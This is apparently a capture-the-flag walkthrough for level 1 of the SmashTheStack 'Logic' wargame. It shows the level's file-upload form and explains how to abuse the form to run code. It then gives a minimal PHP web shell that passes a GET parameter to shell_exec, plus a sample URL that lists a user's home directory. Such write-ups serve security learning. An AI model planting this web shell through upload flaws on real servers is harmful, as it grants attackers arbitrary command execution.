Upon selecting the level1, we are met by this page. So what now? we see we are met with some sort of upload script that allows us to upload a “clearance” to a folder. We are then instructed on where to head to find our next objective. Ok, now what?
Well, even though most of you pretty much figured this out by looking at it, we should go by the book and play it safe. Let’s look at the source:
<html><head><title>Logic @ SmashTheStack -- Level 1 (Send Security Clearance)</title></head> <body> <center> <table> <tr><td><center><H1>Level 1</H1></center></td></tr> <tr><td><hr width="550"></td></tr> <tr><td><center>Please upload your security clearance. Files will be in uploads/</center></td></tr><br><br><br> <tr><td> <center> <form enctype="multipart/form-data" action="send_clearance.php" method="POST"> <input type="hidden" name="MAX_FILE_SIZE" value="100000" /> Choose a file to upload: <input name="uploadedfile" type="file" /> <input type="submit" value="Upload" /> </form> </td></tr> <tr><td><center>Once clearance is obtained, poke around the user directories for access to level2</td></tr> <p><br> </table> </center> </body> </html>
What do we see here? Well, we see that we are POST’ing our uploaded file to send_clearance.php. Also, we see we have a max file size of 100,000 bytes (roughly 100 kB), but what does any of this mean? Well, for starters, we know we are dealing with a web server that can process/serve php files (most likely some flavor of Apache), also files larger than 100 kB will probably fail. So let’s try to upload something benign, such as an image to see where it lands. Upon uploading that image, we should see something like:
The file Tq5uPaV.jpg has been uploaded
But where is this file? If we look back at the first page, it gives us the directory of uploads/. Let’s browse to uploads/ and see if they left directory listing on.
This is where files are uploaded for level1. All files in here are removed after 24 hours.
Ok, so while won’t be able to see everyone else’s uploads, we should still be able to view our upload. Browsing to http://logic.smashthestack.org:8181/uploads/Tq5uPaV.jpg we get:
Sweet! No 404 error! So how do we use this to view a user’s home directory? Well maybe we can push other things to the server that aren’t jpegs… maybe something that will allow us to execute commands on this server. We know that we can push anything under 100kB a file at a time, so a small binary remote shell could be possible. But we would have to guess the architecture, guess the operating system, compile it, attempt to push it to the server via upload, and hope that the user that the web server is running as (most likely apache) can execute such a file. What about a php file? In fact, this is very similar to a Remote File Inclusion (RFI), and is sometimes called Local File Inclusion (LFI). So what kind of php file should we upload? First we should see if we can upload and execute any php script. Let’s try:
<?php echo "<pre>\n"; echo "test"; echo "</pre>"; ?>
Upon execution, we get:
[Would be a picture of just “test”, but when I went back through to capture the screenshot, the server was suffering from numerous 500 errors]
We could go out and download a “c99.php” shell, but I think we should try to build our own. Our design goal is to run a command and have the output returned to us. We will want to have the ability to pass commands to our script via GET variable. This will allow us to just change the value after the passed variable in the URL and receive our output instantly. We will accomplish this with shell_exec (www.php.net/shell_exec) and $_GET. See the code below for details:
<?php echo "<pre>\n"; echo "cmd = ".$_GET['cmd']; $cmd = $_GET['cmd']; echo shell_exec((string)$cmd); echo "</pre>"; ?>
Upon executing this, we should be able to pass almost any linux command as a value to the variable ‘cmd’ and receive our ouput. For example, simply entering http://logic.smashthestack.org:8181/uploads/cmd6.php?cmd=ls -al /home/level1/ should return a listing of level1’s home folder. It’s crude, but it is effective. From here, the rest of the solution is left as an exercise to the reader (there really isn’t much left).